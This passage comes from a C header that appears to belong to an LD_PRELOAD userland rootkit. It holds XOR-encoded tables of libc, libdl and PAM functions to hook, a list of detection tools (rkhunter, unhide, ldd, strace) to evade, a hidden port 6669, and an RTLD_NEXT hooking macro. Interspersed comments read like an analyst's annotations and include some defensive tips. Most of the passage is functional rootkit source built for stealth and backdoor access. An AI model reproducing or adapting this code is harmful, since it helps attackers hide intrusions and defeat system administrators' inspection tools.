    "\xd9\xdc\xc8\xdb\xd8\xc1\xdc\xd4" /* updwtmpx */
};

/*
 * The same names as calls[] minus the PAM, audit, pcap_loop and dl* entries,
 * in a slightly different order (ptrace and the fwrite/fputs variants come
 * before fgets). The C* indices above therefore do NOT apply to this array.
 * Presumably these are the names looked up in the C library; the consuming
 * code is not in this header.
 */
#define LIBC_SIZE 93
static char *libc_calls[LIBC_SIZE] = {
    "\xde\xc9\xc2\xcd\xc1\xc9", /* rename */
    "\xde\xc9\xc2\xcd\xc1\xc9\xcd\xd8", /* renameat */
    "\xde\xc9\xc2\xcd\xc1\xc9\xcd\xd8\x9e", /* renameat2 */
    "\xca\xde\xc9\xcd\xc8", /* fread */
    "\xdf\xd8\xcd\xd8", /* stat */
    "\xdf\xd8\xcd\xd8\x9a\x98", /* stat64 */
    "\xca\xdf\xd8\xcd\xd8", /* fstat */
    "\xca\xdf\xd8\xcd\xd8\x9a\x98", /* fstat64 */
    "\xca\xdf\xd8\xcd\xd8\xcd\xd8", /* fstatat */
    "\xca\xdf\xd8\xcd\xd8\xcd\xd8\x9a\x98", /* fstatat64 */
    "\xc0\xdf\xd8\xcd\xd8", /* lstat */
    "\xc0\xdf\xd8\xcd\xd8\x9a\x98", /* lstat64 */
    "\xf3\xf3\xc0\xd4\xdf\xd8\xcd\xd8", /* __lxstat */
    "\xf3\xf3\xc0\xd4\xdf\xd8\xcd\xd8\x9a\x98", /* __lxstat64 */
    "\xf3\xf3\xca\xd4\xdf\xd8\xcd\xd8", /* __fxstat */
    "\xf3\xf3\xca\xd4\xdf\xd8\xcd\xd8\x9a\x98", /* __fxstat64 */
    "\xf3\xf3\xd4\xdf\xd8\xcd\xd8", /* __xstat */
    "\xf3\xf3\xd4\xdf\xd8\xcd\xd8\x9a\x98", /* __xstat64 */
    "\xdc\xd8\xde\xcd\xcf\xc9", /* ptrace */
    "\xca\xdb\xde\xc5\xd8\xc9", /* fwrite */
    "\xca\xdb\xde\xc5\xd8\xc9\xf3\xd9\xc2\xc0\xc3\xcf\xc7\xc9\xc8", /* fwrite_unlocked */
    "\xca\xdc\xd9\xd8\xdf\xf3\xd9\xc2\xc0\xc3\xcf\xc7\xc9\xc8", /* fputs_unlocked */
    "\xca\xcb\xc9\xd8\xdf", /* fgets */
    "\xca\xcb\xc9\xd8\xca\xc0\xcd\xcb\xdf", /* fgetflags */
    "\xca\xdf\xc9\xd8\xca\xc0\xcd\xcb\xdf", /* fsetflags */
    "\xc9\xd4\xc9\xcf\xda\xc9", /* execve */
    "\xc9\xd4\xc9\xcf\xda\xdc", /* execvp */
    "\xc0\xc5\xc2\xc7", /* link */
    "\xc0\xc5\xc2\xc7\xcd\xd8", /* linkat */
    "\xd9\xc2\xc0\xc5\xc2\xc7", /* unlink */
    "\xd9\xc2\xc0\xc5\xc2\xc7\xcd\xd8", /* unlinkat */
    "\xdf\xd5\xc1\xc0\xc5\xc2\xc7", /* symlink */
    "\xdf\xd5\xc1\xc0\xc5\xc2\xc7\xcd\xd8", /* symlinkat */
    "\xc1\xc7\xc8\xc5\xde", /* mkdir */
    "\xc1\xc7\xc8\xc5\xde\xcd\xd8", /* mkdirat */
    "\xde\xc1\xc8\xc5\xde", /* rmdir */
    "\xc3\xdc\xc9\xc2\xc8\xc5\xde", /* opendir */
    "\xc3\xdc\xc9\xc2\xc8\xc5\xde\x9a\x98", /* opendir64 */
    "\xca\xc8\xc3\xdc\xc9\xc2\xc8\xc5\xde", /* fdopendir */
    "\xde\xc9\xcd\xc8\xc8\xc5\xde", /* readdir */
    "\xde\xc9\xcd\xc8\xc8\xc5\xde\x9a\x98", /* readdir64 */
    "\xcf\xc4\xc8\xc5\xde", /* chdir */
    "\xca\xcf\xc4\xc8\xc5\xde", /* fchdir */
    "\xcd\xcf\xcf\xc9\xdf\xdf", /* access */
    "\xc3\xdc\xc9\xc2", /* open */
    "\xc3\xdc\xc9\xc2\x9a\x98", /* open64 */
    "\xca\xc3\xdc\xc9\xc2", /* fopen */
    "\xca\xc3\xdc\xc9\xc2\x9a\x98", /* fopen64 */
    "\xcf\xde\xc9\xcd\xd8", /* creat */
    "\xc1\xc7\xdf\xd8\xc9\xc1\xdc", /* mkstemp */
    "\xcd\xcf\xcf\xc9\xdc\xd8", /* accept */
    "\xdf\xc9\xd8\xcb\xc5\xc8", /* setgid */
    "\xdf\xc9\xd8\xde\xc9\xcb\xc5\xc8", /* setregid */
    "\xdf\xc9\xd8\xde\xc9\xdf\xcb\xc5\xc8", /* setresgid */
    "\xcb\xc9\xd8\xdc\xdb\xc2\xcd\xc1\xf3\xde", /* getpwnam_r */
    "\xcb\xc9\xd8\xdc\xdb\xc2\xcd\xc1", /* getpwnam */
    "\xcb\xc9\xd8\xdf\xdc\xc2\xcd\xc1", /* getspnam */
    "\xcb\xc9\xd8\xdc\xdb\xd9\xc5\xc8", /* getpwuid */
    "\xc7\xc5\xc0\xc0", /* kill */
    "\xcf\xc4\xc1\xc3\xc8", /* chmod */
    "\xcf\xc4\xc3\xdb\xc2", /* chown */
    "\xca\xcf\xc4\xc1\xc3\xc8", /* fchmod */
    "\xca\xcf\xc4\xc3\xdb\xc2", /* fchown */
    "\xca\xcf\xc4\xc3\xdb\xc2\xcd\xd8", /* fchownat */
    "\xc0\xcf\xc4\xc3\xdb\xc2", /* lchown */
    "\xc0\xc5\xdf\xd8\xd4\xcd\xd8\xd8\xde", /* listxattr */
    "\xc0\xc0\xc5\xdf\xd8\xd4\xcd\xd8\xd8\xde", /* llistxattr */
    "\xca\xc0\xc5\xdf\xd8\xd4\xcd\xd8\xd8\xde", /* flistxattr */
    "\xcb\xc9\xd8\xd4\xcd\xd8\xd8\xde", /* getxattr */
    "\xc0\xcb\xc9\xd8\xd4\xcd\xd8\xd8\xde", /* lgetxattr */
    "\xca\xcb\xc9\xd8\xd4\xcd\xd8\xd8\xde", /* fgetxattr */
    "\xdf\xc9\xd8\xd4\xcd\xd8\xd8\xde", /* setxattr */
    "\xc0\xdf\xc9\xd8\xd4\xcd\xd8\xd8\xde", /* lsetxattr */
    "\xca\xdf\xc9\xd8\xd4\xcd\xd8\xd8\xde", /* fsetxattr */
    "\xde\xc9\xc1\xc3\xda\xc9\xd4\xcd\xd8\xd8\xde", /* removexattr */
    "\xc0\xde\xc9\xc1\xc3\xda\xc9\xd4\xcd\xd8\xd8\xde", /* lremovexattr */
    "\xca\xde\xc9\xc1\xc3\xda\xc9\xd4\xcd\xd8\xd8\xde", /* fremovexattr */
    "\xcb\xc9\xd8\xd9\xd8\xc9\xc2\xd8", /* getutent */
    "\xcb\xc9\xd8\xd9\xd8\xd4\xc9\xc2\xd8", /* getutxent */
    "\xdc\xd9\xd8\xd9\xd8\xc0\xc5\xc2\xc9", /* pututline */
    "\xcb\xc9\xd8\xdc\xdb\xc9\xc2\xd8", /* getpwent */
    "\xdf\xd5\xdf\xc0\xc3\xcb", /* syslog */
    "\xf3\xf3\xdf\xd5\xdf\xc0\xc3\xcb\xf3\xcf\xc4\xc7", /* __syslog_chk */
    "\xdf\xc3\xcf\xc7\xc9\xd8", /* socket */
    "\xc0\xc3\xcb\xc5\xc2", /* login */
    "\xdf\xc9\xd8\xc9\xcb\xc5\xc8", /* setegid */
    "\xdc\xd9\xd8\xd9\xd8\xd4\xc0\xc5\xc2\xc9", /* pututxline */
    "\xcb\xc9\xd8\xd9\xd8\xc5\xc8", /* getutid */
    "\xcb\xc9\xd8\xd9\xd8\xd4\xc5\xc8", /* getutxid */
    "\xcb\xc9\xd8\xd9\xd8\xc1\xdc", /* getutmp */
    "\xcb\xc9\xd8\xd9\xd8\xc1\xdc\xd4", /* getutmpx */
    "\xd9\xdc\xc8\xdb\xd8\xc1\xdc", /* updwtmp */
    "\xd9\xdc\xc8\xdb\xd8\xc1\xdc\xd4" /* updwtmpx */
};

/* The three dl* names from calls[], kept as their own list. */
#define LIBDL_SIZE 3
static char *libdl_calls[LIBDL_SIZE] = {
    "\xc8\xc0\xcd\xc8\xc8\xde", /* dladdr */
    "\xc8\xc0\xc5\xc2\xca\xc3", /* dlinfo */
    "\xc8\xc0\xdf\xd5\xc1" /* dlsym */
};

/* The three PAM entry points from calls[], kept as their own list. */
#define LIBPAM_SIZE 3
static char *libpam_calls[LIBPAM_SIZE] = {
    "\xdc\xcd\xc1\xf3\xcd\xd9\xd8\xc4\xc9\xc2\xd8\xc5\xcf\xcd\xd8\xc9", /* pam_authenticate */
    "\xdc\xcd\xc1\xf3\xc3\xdc\xc9\xc2\xf3\xdf\xc9\xdf\xdf\xc5\xc3\xc2", /* pam_open_session */
    "\xdc\xcd\xc1\xf3\xcd\xcf\xcf\xd8\xf3\xc1\xcb\xc1\xd8" /* pam_acct_mgmt */
};

/*
 * Decoded entries: ldd, unhide, rkhunter, chkproc, chkdirs, ltrace, strace
 * and LD_AUDIT, i.e. names of inspection tools plus one loader variable.
 * How the list is consumed is not shown here; presumably the library changes
 * its behaviour when one of these is seen (confirm against the caller).
 * A check keyed on names would say nothing about a tool that is statically
 * linked or run against an offline copy of the filesystem.
 */
#define GPSIZE 8
static char *gay_procs_list[GPSIZE] = {
    "\xc0\xc8\xc8", /* ldd */
    "\xd9\xc2\xc4\xc5\xc8\xc9", /* unhide */
    "\xde\xc7\xc4\xd9\xc2\xd8\xc9\xde", /* rkhunter */
    "\xcf\xc4\xc7\xdc\xde\xc3\xcf", /* chkproc */
    "\xcf\xc4\xc7\xc8\xc5\xde\xdf", /* chkdirs */
    "\xc0\xd8\xde\xcd\xcf\xc9", /* ltrace */
    "\xdf\xd8\xde\xcd\xcf\xc9", /* strace */
    "\xe0\xe8\xf3\xed\xf9\xe8\xe5\xf8" /* LD_AUDIT */
};

/* 6669 is the pam_port value from the top of the file; the trailing -1
 * looks like a list terminator (confirm against the code that walks it).
 * Given PROC_NET_TCP earlier in the file, connections on these ports are
 * presumably dropped from what local tools read there, so compare against
 * a view taken from outside the host, such as flow logs or a scan from
 * another machine. */
int hidden_ports[] = {6669,-1};

/* Resolves old_sym on first use: when the pointer is still null it is set
 * from get_symbol(RTLD_NEXT, sym). get_symbol is defined elsewhere;
 * RTLD_NEXT is the dlsym() handle meaning "the next definition after the
 * calling object", which is how an interposing library reaches the function
 * it shadows. Note the expansion is a bare `if` statement. */
#define HOOK(old_sym, sym) if(!old_sym) old_sym = get_symbol(RTLD_NEXT, sym)

/* Passes var and its strlen to cleanup(), which is defined elsewhere;
 * presumably it wipes a decoded string after use (confirm). */
#define CLEAN(var) cleanup(var, strlen(var))